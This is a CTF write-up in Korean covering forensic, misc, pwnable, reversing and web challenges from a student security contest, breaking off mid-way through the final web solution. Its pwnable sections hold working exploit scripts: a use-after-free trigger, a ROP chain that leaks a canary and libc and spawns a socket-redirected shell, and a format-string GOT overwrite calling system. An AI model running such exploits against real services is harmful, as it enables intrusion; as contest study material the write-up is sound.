
@5unKn0wn
Created November 6, 2017 05:37

Catholic White Hacker League write-ups

한국디지털미디어고등학교 이태양 (뮤쀼)

Forensic - Lurker (440)

비밀번호를 찾아달라는 포렌식 문제이다.
.dmp 파일에서 비밀번호를 찾아야 하지만 binwalk를 돌려서 PNG파일들의 위치를 찾아내서 다 추출해서 보니까 거기에 플래그가 있었다.
유일하게 PNG크기가 1152 x 648 이어서 수상해서 추출했더니 플래그였다.

CATSEC{Oh_GoodGoodGoodVeryGood}

Misc - Ultralisk (440)

1 ~ 0xf의 난수를 발생시켜서 몫과 나머지를 난수와 함께 4글자 단위로 저장한다.
네글자씩 읽어서 난수 * 몫 + 나머지 해서 저장하면 된다.

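import binascii

# flag.enc stores every original byte as one 4-hex-digit record:
#   digit 0      -> the random divisor (1..0xf, per the write-up)
#   digits 1..2  -> the quotient
#   digit 3      -> the remainder
# so the original byte is divisor * quotient + remainder.
with open("flag.enc", "rb") as src:
	enc = binascii.hexlify(src.read()).decode("ascii")

# A trailing partial record would otherwise surface as an IndexError mid-loop.
if len(enc) % 4:
	raise ValueError("flag.enc does not contain a whole number of 4-hex-digit records")

dec = bytearray()
for i in range(0, len(enc), 4):
	divisor = int(enc[i], 16)
	quotient = int(enc[i + 1:i + 3], 16)
	remainder = int(enc[i + 3], 16)
	# bytearray.append rejects values above 255, so a corrupt record fails loudly.
	dec.append(divisor * quotient + remainder)

with open("flag.png", "wb") as dst:
	dst.write(dec)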

위의 복호화 소스를 돌리면 플래그 사진이 복호화된다.

CATSEC{Y0u_Ar3_G3n1us}

Pwnable - SCV (400)

바이너리는 엄청 단순하고 money가 99999999999 이상이 되면 플래그를 출력해준다.
Alchemy 메뉴에서 mineral이 하나만 있으면 연금술을 위해 free는 하는데 cnt가 1이기 때문에 그대로 fail 하면서 리턴해버린다.
이 때 바로 Selling을 하면 uaf가 발생한다.
그리고 Init을 보면 10초 후에 strdup으로 "Bitcoin" 문자열을 mineral_type 어딘가에 넣는데 strdup은 힙 영역을 사용하므로 Mining - Alchemy을 해서 bag에 free된 mineral이 들어가있게 하고 10초를 기다려서 free된 영역에 "Bitcoin" 문자열이 들어갔을 때 Selling을 하면 돈이 99999999999를 넘어서 플래그를 출력해준다.

from pwn import *

# Walks the service menu in the order the write-up describes:
# Mining -> Alchemy -> wait for the timer -> Selling.
# Root cause (per the write-up): with a single mineral, Alchemy frees it and then
# returns on the failure path, leaving the freed entry in the bag, so Selling
# reads freed memory (use-after-free). The service-side fix is to drop the bag
# entry whenever the mineral is freed.
r = remote("1.224.175.35", 30001)

# NOTE(review): option "1" is presumably Mining (puts one mineral in the bag) — confirm against the binary.
r.sendlineafter(">> ", "1")
sleep(3)
# NOTE(review): option "3" is presumably Alchemy, which frees the mineral — confirm.
r.sendlineafter(">> ", "3")
# 3 s + 8 s = 11 s in total, i.e. longer than the 10-second delay after which
# Init's strdup("Bitcoin") runs (per the write-up) and can reuse the freed chunk.
sleep(8)
# NOTE(review): option "2" is presumably Selling, which prices the stale bag entry — confirm.
r.sendlineafter(">> ", "2")

r.interactive()

CATSEC{SCV_1S_BESF_0F_UNIT_1N_STARCRAFT}

Pwnable - Ghost (440)

이 바이너리는 소켓으로 통신하는데 소켓은 바이너리가 재실행 되기 전에는 카나리와 립씨 주소가 항상 같으므로 익스할 때 편했다.
6번 메뉴에서 버퍼 오버플로우 취약점이 있다.
다른 메뉴들에서 취약점을 트리거하기 위한 조건들만 조금씩 맞춰주면 된다.
6번에서 카나리 릭하고 다시 연결해서 릭한 카나리로 ROP해서 립씨 주소 릭하고 다시 연결해서 bss에 "/bin/sh 0<&4 1>&4 2>&4;" 소켓으로 리다이렉팅 시켜주는 /bin/sh 문자열 read하고 system함수를 호출하면 된다.

from pwn import *

def set_trigger():
	"""Answer the start prompt, then send the fixed menu sequence that ends on option 6.

	Talks to the module-level pwntools tube ``r``. The write-up only says that
	the other menu options are used to satisfy the preconditions for option 6;
	what each individual option does is not shown here.
	"""
	r.sendlineafter("exterminator? ", "y")
	# Order sent: 6, 6, 5, 4, 3, 2, 2, 2, 1, 1, 1, 6
	menu_sequence = ["6"] * 2 + ["5", "4", "3"] + ["2"] * 3 + ["1"] * 3 + ["6"]
	for choice in menu_sequence:
		r.sendlineafter("choice) :", choice)

# Stage 1 - read the stack canary back from the service.
# The write-up notes that the canary and the libc base stay the same across
# connections until the service binary is restarted, which is why a value read
# on one connection is still valid on the next.
# Defender note: the overflow is in menu option 6 (per the write-up). Bounding
# that read to the buffer size removes the bug; a service that re-executes per
# connection would presumably hand every client a fresh canary and libc base.
r = remote("1.224.175.52", 30003)

set_trigger()
# 0xc7 filler bytes; sendlineafter appends the trailing newline.
r.sendlineafter("Chance : ", 'A' * 0xc7)
r.recvuntil("A\n")
# The 8 bytes that follow the echoed filler are interpreted as the canary.
canary = u64(r.recv(8))
log.info("canary : " + hex(canary))
r.close()

# Stage 2 - with the canary restored in place, return into a chain that calls
# write(4, <GOT entry>, 8) so the service sends back a libc pointer.
# NOTE(review): fd 4 is presumably the client socket, consistent with the "&4"
# redirections in the final command string — confirm.
r = remote("1.224.175.52", 30003)
set_trigger()
payload = "A" * 0xc8
payload += p64(canary)
# 8 bytes between the canary and the return address (presumably the saved frame pointer).
payload += "B" * 8
payload += p64(0x00000000004015b3)	# pop rdi
payload += p64(4)
payload += p64(0x000000000040153d)	# pop rdx
payload += p64(8)
payload += p64(0x00000000004015b1)	# pop rsi r15
payload += p64(0x0000000000602F90)	# __libc_start_main got
payload += "AAAAAAAA"
payload += p64(0x00000000004009F0)	# write
r.sendlineafter("Chance : ", payload)
r.recvuntil(p64(canary))
# NOTE(review): 0x20740 and 0x45390 are presumably the offsets of __libc_start_main
# and system in the libc build the service runs; they are only valid for that build.
libc_base = u64(r.recv(8)) - 0x20740
system = libc_base + 0x45390
log.info("libc_base : " + hex(libc_base))
r.close()

# Stage 3 - chain read(4, .bss, 24) followed by system(.bss); the command string
# is sent afterwards and lands in .bss.
r = remote("1.224.175.52", 30003)
set_trigger()
payload = "A" * 0xc8
payload += p64(canary)
payload += "AAAAAAAA"
payload += p64(0x00000000004015b3)	# pop rdi
payload += p64(4)
payload += p64(0x000000000040153d)	# pop rdx
payload += p64(24)
payload += p64(0x00000000004015b1)	# pop rsi r15
payload += p64(0x0000000000603010)	# .bss
payload += "AAAAAAAA"
payload += p64(0x0000000000400A28)	# read
payload += p64(0x00000000004015b3)	# pop rdi
payload += p64(0x0000000000603010)	# .bss
payload += p64(system)				# system
payload += "AAAAAAAA"

r.sendlineafter("Chance : ", payload)
# The redirections point the shell's stdin/stdout/stderr at descriptor 4.
r.sendlineafter(p64(canary), "/bin/sh 0<&4 1>&4 2>&4;")

r.interactive()

CATSEC{1m_ab0uT_T0_0v3r10rd_mY_aggr35510n_1nh1b1T0r5}

Pwnable - egg (460)

그냥 간단하게 포맷스트링이 일어나는 바이너리이다.
근데 fini_array에 write권한도 없고 스택 주소도 모르고 printf 후 바로 종료를 해서 어딜 덮어야 하나 고민하다가 canary까지 오버플로우가 나는 것을 보고 __stack_chk_fail의 got를 _start의 주소로 덮어서 카나리를 조작해서 계속 main을 호출했다.
포맷스트링으로 립씨 주소를 릭하고 got를 덮은 후에 다시 호출되면 __stack_chk_fail를 다시 system으로 덮고 system의 인자에 유저인풋이 있도록 스택을 잘 끌어올려 중간에 ;/bin/sh;를 넣어서 쉘을 실행할 수 있다.

from pwn import *

# Root cause (per the write-up): user input reaches printf as the format string.
# Defender note: passing the buffer as data (printf("%s", buf)) removes the bug;
# a read-only GOT (full RELRO) would also block the GOT writes used below.
r = remote("1.224.175.32", 30006)

# Round 1 - the payload starts with three GOT addresses.
payload = p32(0x0804A014)	# __stack_chk_fail
payload += p32(0x0804A016)	# __stack_chk_fail + 2
payload += p32(0x0804A01C)	# __libc_start_main
# 12 bytes are already printed, so 12 + 33844 = 0x8440 is stored by %6$hn.
# NOTE(review): assumes argument slots 6, 7 and 8 are the three addresses above — confirm.
payload += '%33844c%6$hn'
# Running count becomes 0x10804; %7$hn stores its low 16 bits, 0x0804.
# Together the two halves give 0x08048440, which the write-up identifies as _start.
payload += '%33732c%7$hn'
# Marker so the leaked bytes can be located in the output.
payload += '5unKn0wn'
# Prints the memory at the third address, i.e. the __libc_start_main GOT entry.
payload += '%8$s'
# Pad to 0x67 bytes; per the write-up the input overflows into the canary, so
# __stack_chk_fail (now redirected) is called and the program starts over.
payload += 'A' * (0x67 - len(payload))

r.sendlineafter("Start..\n", payload)
r.recvuntil("5unKn0wn")
# NOTE(review): 0x18540 and 0x3ADA0 are presumably the offsets of __libc_start_main
# and system in the service's libc build; they are only valid for that build.
libc_base = u32(r.recv(4)) - 0x00018540
system = libc_base + 0x3ADA0
log.info("libc_base : " + hex(libc_base))

# Round 2 - filler only, no format directives.
# NOTE(review): presumably this extra pass is the stack adjustment the write-up
# mentions (so that user input ends up where system's argument is read) — confirm.
r.sendlineafter("Start..\n", 'A' * 0x67)

# Round 3 - rewrite the same GOT entry with the computed address of system.
payload = p32(0x0804A014)	# __stack_chk_fail
payload += p32(0x0804A016)	# __stack_chk_fail + 2
# Two addresses (8 bytes) are already printed, hence the "- 8".
payload += '%' + str((system & 0xffff) - 8) + 'c%6$hn'
# Advance the running count to the high half, modulo 0x10000.
payload += '%' + str(((system >> 16) - (system & 0xffff)) & 0xffff) + 'c%7$hn'
# The ';' separators isolate the command from the surrounding bytes (per the write-up).
payload += 'AAAAAAAAAAA;/bin/sh;'
payload += 'A' * (0x67 - len(payload))

r.sendlineafter("Start..\n", payload)

r.interactive()

CATSEC{Start_n0w!!!!!~}

Reversing - Archon (430)

C#으로 만들어졌길래 디컴파일해서 보니까 18글자를 아스키 범위에서 입력받아 xor이랑 이런저런 연산을 해서 크기랑 값을 막 복잡하게 비교한다.
손으로 하기에는 무리가 있기에 파이썬 z3을 이용해서 올바른 input을 구했다.

from z3 import *

# Model the 18 input characters as 8-bit bit-vectors and collect the checks
# recovered from the decompiled C# program as solver constraints.
# NOTE(review): on z3 BitVec values, Python's >= / < are signed comparisons and
# >> is an arithmetic shift, and all arithmetic wraps modulo 256. If the original
# program compares the characters as wider integers, UGE/ULT/LShR or a wider
# bit-vector may be the closer model — confirm against the decompiled code.
inp = [BitVec('inp_%d' % i, 8) for i in range(18)]
s = Solver()
# tmp starts at 0 and is incremented once per iteration, so it always equals i.
tmp = 0

for i in range(16):
	# Printable-ASCII range for inp[i].
	# NOTE(review): the loop stops at 15, so inp[16] and inp[17] get no range
	# constraint even though the write-up says all 18 characters are ASCII.
	s.add(inp[i] >= 32, inp[i] < 0x7f)
	if i == 6:
		# Position 6 is checked against the last two characters instead of its neighbours.
		num1 = inp[6]
		num2 = inp[16]
		num3 = inp[17]
		# Python parses "a >> 2 ^ b" as "(a >> 2) ^ b", matching the explicit form in the else branch.
		temp1 = num2 >> 2 ^ num3
		temp2 = num3 >> 2 ^ num1
		temp3 = num2 >> 2 ^ num1
		s.add(num1 >= temp1, num2 >= temp2, num3 >= temp3)
	else:
		# inp[i] must be at least (next >> 2) ^ next-but-one.
		num1 = inp[i]
		num2 = (inp[i + 1] >> 2) ^ inp[i + 2]
		s.add(num1 >= num2)
	if (i % 2 == 0) and i < 14:
		# Even positions 0..12: one arithmetic relation plus a fixed XOR of
		# inp[i], inp[i + 2], inp[i + 4]; num4 is the mirrored character inp[17 - i].
		num1 = inp[i]
		num2 = inp[i + 2]
		num3 = inp[i + 4]
		num4 = inp[17 - i]
		if tmp == 0:
			s.add(num1 == (num2 ^ num3) + num4, 94 == (num1 ^ num2 ^ num3))
		elif tmp == 2:
			s.add(num1 == (num2 ^ num3) - num4 + 5, 32 == (num1 ^ num2 ^ num3))
		elif tmp == 4:
			s.add(num1 == ((num2 ^ num3) - num4) * 18, 11 == (num1 ^ num2 ^ num3))
		elif tmp == 6:
			s.add(num1 == (num2 ^ num3) + num4 - 2, 49 == (num1 ^ num2 ^ num3))
		elif tmp == 8:
			s.add(num1 == (num2 ^ num3 ^ num4) - 4, 89 == (num1 ^ num2 ^ num3))
		elif tmp == 10:
			s.add(num1 == (num2 ^ num3 ^ num4) + 19, 114 == (num1 ^ num2 ^ num3))
		elif tmp == 12:
			s.add(num1 == -((num2 ^ num3) & 2) + num4, 69 == (num1 ^ num2 ^ num3))
	elif (i % 2 != 0) and i < 14:
		# Odd positions 1..13: only the fixed XOR of the three characters is checked
		# (num4 is assigned but not used in this branch).
		num1 = inp[i]
		num2 = inp[i + 2]
		num3 = inp[i + 4]
		num4 = inp[17 - i]
		if tmp == 1:
			s.add(102 == (num1 ^ num2 ^ num3))
		elif tmp == 3:
			s.add(74 == (num1 ^ num2 ^ num3))
		elif tmp == 5:
			s.add(107 == (num1 ^ num2 ^ num3))
		elif tmp == 7:
			s.add(57 == (num1 ^ num2 ^ num3))
		elif tmp == 9:
			s.add(89 == (num1 ^ num2 ^ num3))
		elif tmp == 11:
			s.add(41 == (num1 ^ num2 ^ num3))
		elif tmp == 13:
			s.add(40 == (num1 ^ num2 ^ num3))
	tmp += 1

# NOTE(review): the result of check() is not inspected; model() is only usable
# when the solver reported sat.
s.check()

m = s.model()
# Print the 18 solved characters as one string.
print ''.join(chr(m[inp[i]].as_long()) for i in range(18))

이 결과 출력된 올바른 input은 Is_tHa7_tUr3_?_%E2 이고 이를 한 글자씩 입력하면 플래그가 나온다.

CATSEC{d0_7ou_kN0VV_Me1Omanc3_??_goO0od_!!}

Reversing - medic (450)

루틴을 보니까 테이블이 변경된 base64 같다.
변경된 테이블과 루틴할 때 조금 xor하는거만 신경써서 base64 디코딩해주면 된다.

def base64_decode(s):
    """Decode *s* with the challenge's reordered base64 alphabet.

    Every '=' is removed first. Characters are then consumed in groups of
    four; each adjacent pair inside a group contributes one output character
    built from the low bits of the earlier symbol and the high bits of the
    later one. A character is only looked up when it takes part in a pair, so
    a lone trailing character at the start of a new group is never validated.
    Raises ValueError (from str.index) for a character outside the alphabet.
    """
    alphabet = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210 /"
    text = s.replace("=", "")
    out = []
    for pos in range(1, len(text)):
        phase = pos % 4
        if phase == 0:
            # First symbol of a new group: nothing to emit yet.
            continue
        # Bits still owed by the previous symbol: 6, 4, 2 for phases 1, 2, 3.
        carry_bits = 8 - 2 * phase
        high = alphabet.index(text[pos - 1]) & ((1 << carry_bits) - 1)
        low = alphabet.index(text[pos]) >> (carry_bits - 2)
        out.append(chr((high << (8 - carry_bits)) | low))
    return "".join(out)

# Three 32-item sequences taken from the binary; XOR-ing them position by
# position and reversing the result yields the custom-base64 text.
fake = "J9UFF9EWv9AABCEOHFEKAqUNNnVcIaM0"
secret_md5 = "5D8F988547D3B4087AE478403145ADC9"
resu = [0x4F, 0x38, 0x39, 0x79, 0x1B, 0x58, 0x3E, 0x28, 0x2D, 0x3A, 0x41, 0x08, 0x4A, 0x32, 0x1B, 0x0E, 0x14, 0x46, 0x46, 0x06, 0x05, 0x26, 0x58, 0x08, 0x2A, 0x1A, 0x5B, 0x10, 0x4E, 0x70, 0x37, 0x43]

xored = ''.join(
    chr(ord(fake_ch) ^ ord(md5_ch) ^ mask)
    for fake_ch, md5_ch, mask in zip(fake, secret_md5, resu)
)
encoded_base64 = xored[::-1]

print(base64_decode(encoded_base64))

CATSEC{IamFinePineApple}

Reversing - Queen (480)

테트리스 게임 문제이다.
처음에는 패치해서 풀라고 했는데 뭔가 자꾸 오류가 나고 잘 안돼서 걍 플래그 구하는 루틴을 직접 코딩해서 풀었다.

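# Encoded flag values lifted from the game; only the low byte of each is used.
flag_table = [74, 93, 109, 51, 212, 143, 362, 311, 393, 619, 86, 101, 86, 21, 206, 173, 355, 261, 486, 638, 108, 111, 77, 63, 208, 190, 295, 259, 465, 626, 96, 41, 68]

# Key stream: the low byte of the running score after each of ten steps,
# where step n adds (10 * n - 1) points.
xor_table = []
score = 0
for step in range(1, 11):
	score += 10 * step - 1
	xor_table.append(score & 0xff)

# XOR each table entry with the key stream, which repeats every ten entries.
flag = ''.join(
	chr((value & 0xff) ^ xor_table[pos % len(xor_table)])
	for pos, value in enumerate(flag_table)
)

# Parenthesised single-argument form prints the same on Python 2 and Python 3;
# the bare print statement is a SyntaxError on Python 3.
print(flag)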

CATSEC{W0w_you_are_best_Ar6chni5}

Reversing - Corsair (490)

flag.docx를 읽어서 세제곱근을 구해가지고 3차원 배열에 넣어서 연산을 한다.
urandom 값으로 처음에 add하고 난 후에 32번 각 열들을 회전하는 듯한 연산을 한다.
그냥 파이썬으로 포팅해서 역연산 코드를 짜서 풀었다.

import math

def encrypt(plain, urandom1, urandom2, cnt):
	"""Scramble the first cnt**3 characters of *plain* as a cnt x cnt x cnt cube.

	Steps, in order:
	  1. Fill cube[i][j][k] from *plain* in row-major order.
	  2. Add the repeating 8-character pad *urandom1* to every cell, modulo 256.
	  3. For each of the first 32 characters of *urandom2*, give one layer of
	     the cube a quarter turn: bit 0 selects whether the middle or the last
	     index is held fixed, bit 1 selects the direction, and
	     (value >> 2) % cnt selects the layer.
	  4. Read the cube back out in row-major order.

	The inputs are indexed per item and passed to ord(), so each must yield
	one-character strings. Returns a str of cnt**3 characters.
	"""
	axis = range(cnt)

	# Step 1: load the cube.
	cube = [
		[[ord(plain[(i * cnt + j) * cnt + k]) for k in axis] for j in axis]
		for i in axis
	]

	# Step 2: additive pad, applied in the same row-major order.
	offset = 0
	for plane in cube:
		for row in plane:
			for k in axis:
				row[k] = (row[k] + ord(urandom1[offset % 8])) & 0xff
				offset += 1

	# Step 3: 32 layer turns.
	for step in range(32):
		control = ord(urandom2[step])
		layer = (control >> 2) % cnt
		reverse = control & 2
		if control & 1:
			# Snapshot the layer with the middle index fixed before overwriting it.
			saved = [[cube[a][layer][b] for b in axis] for a in axis]
			for a in axis:
				for b in axis:
					if reverse:
						cube[b][layer][cnt - a - 1] = saved[a][b]
					else:
						cube[cnt - b - 1][layer][a] = saved[a][b]
		else:
			# Snapshot the layer with the last index fixed.
			saved = [[cube[a][b][layer] for b in axis] for a in axis]
			for a in axis:
				for b in axis:
					if reverse:
						cube[cnt - b - 1][a][layer] = saved[a][b]
					else:
						cube[b][cnt - a - 1][layer] = saved[a][b]

	# Step 4: flatten.
	return ''.join(chr(cell) for plane in cube for row in plane for cell in row)



def decrypt(encrypted, urandom1, urandom2, cnt):
	"""Undo encrypt(): reverse the 32 layer turns, then subtract the pad.

	*encrypted* supplies cnt**3 characters that are loaded into a
	cnt x cnt x cnt cube in row-major order. The control characters of
	*urandom2* are replayed back to front, and for each one the opposite turn
	to the one encrypt() performs is applied to the same layer. Finally the
	repeating 8-character pad *urandom1* is subtracted modulo 256 and the cube
	is flattened in row-major order. Returns a str of cnt**3 characters.
	"""
	axis = range(cnt)
	controls = urandom2[::-1]

	cells = [
		[[ord(encrypted[(i * cnt + j) * cnt + k]) for k in axis] for j in axis]
		for i in axis
	]

	for step in range(32):
		control = ord(controls[step])
		layer = (control >> 2) % cnt
		reverse = control & 2
		if control & 1:
			# Layer with the middle index fixed; copy it before writing back.
			saved = [[cells[a][layer][b] for b in axis] for a in axis]
			for a in axis:
				for b in axis:
					if reverse:
						cells[cnt - b - 1][layer][a] = saved[a][b]
					else:
						cells[b][layer][cnt - a - 1] = saved[a][b]
		else:
			# Layer with the last index fixed.
			saved = [[cells[a][b][layer] for b in axis] for a in axis]
			for a in axis:
				for b in axis:
					if reverse:
						cells[b][cnt - a - 1][layer] = saved[a][b]
					else:
						cells[cnt - b - 1][a][layer] = saved[a][b]

	# Remove the additive pad while flattening in row-major order.
	recovered = []
	offset = 0
	for plane in cells:
		for row in plane:
			for cell in row:
				recovered.append(chr((cell - ord(urandom1[offset % 8])) & 0xff))
				offset += 1

	return ''.join(recovered)


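# File layout as consumed below: an 8-byte additive pad, 32 layer-turn control
# bytes, then the scrambled cube data.
with open("flag.enc.docx", "rb") as src:
	enc = src.read()

urandom1 = enc[:8]
urandom2 = enc[8:40]
enc = enc[40:]
# NOTE(review): the write-up says the encoder derives the cube edge from the cube
# root of the input size; here it is fixed at 0x18, so decrypt() uses exactly
# cnt**3 bytes and ignores anything after them.
cnt = 0x18

# Fail with a clear message instead of an IndexError from inside decrypt().
if len(enc) < cnt ** 3:
	raise ValueError("flag.enc.docx is too short for a cube of edge %d" % cnt)

dec = decrypt(enc, urandom1, urandom2, cnt)

with open("flag.docx", "wb") as dst:
	dst.write(dec)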

처음에는 파일이 손상되었다고 나오는데 복구 누르면 복구해준다.

CATSEC{I_L1KE_RUB1X_CUBE_AND_Y0U?}

Reversing - Guardian (490)

apk인데 유니티로 만들어졌다.
유니티로 만들어진 apk는 dex에 실행코드가 아니라 assets/bin/Data/Managed/Assembly-CSharp.dll 에 진짜 동작 코드가 들어있다.
C#으로 만들어졌기 때문에 디컴파일 해서 보면 1등을 했을 때 플래그를 시간 값과 카운트 값을 이용해서 키를 만들고 AES(PKCS7 패딩)로 복호화한다.
시간 값은 0 ~ 180이고 카운트 값은 두자리 이므로 0 ~ 99 일 것이라 예상했다.
브포 가능한 경우의 수이므로 그냥 시간 값과 카운트 값을 브포해서 플래그를 구했다.

from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder

# Base64-decoded ciphertext of the flag (presumably lifted from the decompiled
# Assembly-CSharp.dll described in the write-up).
enc = "PC9al1Z5yLVCjov4DxxUoxCftGm5V92neSDAtvSKSlFrQPiyFh1d56skf/Z7avSl".decode('base64')
# Try every (time, count) pair. The whole key space is only 180 * 99 candidates,
# which is why a key derived from these two game values does not protect the
# flag once the client code can be decompiled.
# NOTE(review): the write-up gives the ranges as 0-180 and 0-99, but range(180)
# stops at 179 and range(99) at 98 — confirm whether the upper bounds belong in.
# NOTE(review): the loop variable `time` would shadow the standard-library module
# of the same name if it were imported in this script.
for time in range(180):
	for cnt in range(99):
		# Key text: "2008" + time + two-digit count, left-padded with '0' to 32 characters.
		key = "2008" + str(time) + str(cnt).zfill(2)
		key = key.zfill(32)

		aes = AES.new(key, AES.MODE_ECB)
		decoder = PKCS7Encoder()

		dec = aes.decrypt(enc)
		# Strip the PKCS7 padding from the candidate plaintext.
		dec = decoder.decode(dec)
		# Only a correct key produces text that starts with the known flag prefix.
		if dec.startswith("CATSEC{"):
			print dec

CATSEC{Have_you_had_a_g00D_tIMe}

Web - Dark Templar (470)

white.js를 보면 /index.php?page=encrypt 랑 /index.php?page=check 가 있는 것을 볼 수 있다.
/index.php?page=check의 소스를 보면 str이 \Y32|H09\T19\T19| ... E29|A30|}39 길게 어떤 값일 때 comment를 출력해준다.
코멘트에는 저 값을 복호화한게 플래그라고 적혀있다.
/index.php?page=encrypt에 값을 보내보면 아스키 문자 하나당 1대 1로 매칭되어 암호화되므로 각 아스키 문자에 대한 테이블을 구해서 복호화했다.
그리고 다시 js소스에 있는 테이블로 base64 디코딩 하고 쓰레기 값 좀 없애주면 플래그가 나온다.

from requests import *

def base64_decode(s):
    """Decode *s* with the alphabet taken from the challenge's JavaScript.

    Every '=' is removed, then each adjacent pair of characters inside a
    group of four yields one output character. A character is only looked up
    when it takes part in a pair. Raises ValueError (from str.index) for a
    character outside the alphabet.

    NOTE(review): this alphabet is 65 characters long and contains '=' at
    index 29. Because '=' is stripped as padding before decoding, a symbol
    with value 29 can never be decoded, and index 64 ('z') does not fit in
    six bits. That may be the source of the stray characters the caller
    removes afterwards — confirm against the original JavaScript.
    """
    b64s = "MGTopUVHklmnqAB2345IJKLrstu+/=RSWXYZabcdeNOPQCDEFfghij67vwxy0189z"
    stripped = s.replace("=", "")
    pieces = []
    for i in range(len(stripped)):
        # Bits carried over from the previous symbol: 0, 6, 4, 2, 0, 6, ...
        left = (8 - 2 * i) % 8
        if left == 0:
            continue
        prev_val = b64s.index(stripped[i - 1])
        cur_val = b64s.index(stripped[i])
        merged = ((prev_val & (2 ** left - 1)) << (8 - left)) | (cur_val >> (left - 2))
        pieces.append(chr(merged))
    return "".join(pieces)

table = "0123456789abcdefghijklmnopqrstvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/="
enc_list = ['|S04', '|E05', '|C06', '|{07', '|T08', '|H09', '|I10', '|S11', '|_12', '|E13', '|N14', '|C15', '|R16', '|Y17', '|P18', '|T19', '|_20', '|I21', '|S22', '|_23', '|V24', '|E25', '|R26', '|Y27', '|_28', '|E29', '|A30', '|S31', '|Y32', '|_33', '|O35', '|R36', '|R37', '|Y38', '|}39', '\\N14', '\\C15', '\\R16', '\\Y17', '\\P18', '\\T19', '\\_20', '\\I21', '\\S22', '\\_23', '\\V24', '\\E25', '\\R26', '\\Y27', '\\_28', '\\E29', '\\A30', '\\S31', '\\Y32', '\\_33', '\\S34', '\\O35', '\\R36', '\\R37', '\\Y38', '\\}39', '|C01', '|A02', '|T03']
enc = "\Y32|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|_33|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|V24\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\_23\Y38\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|C06|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\
T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|S31|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|_33|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T1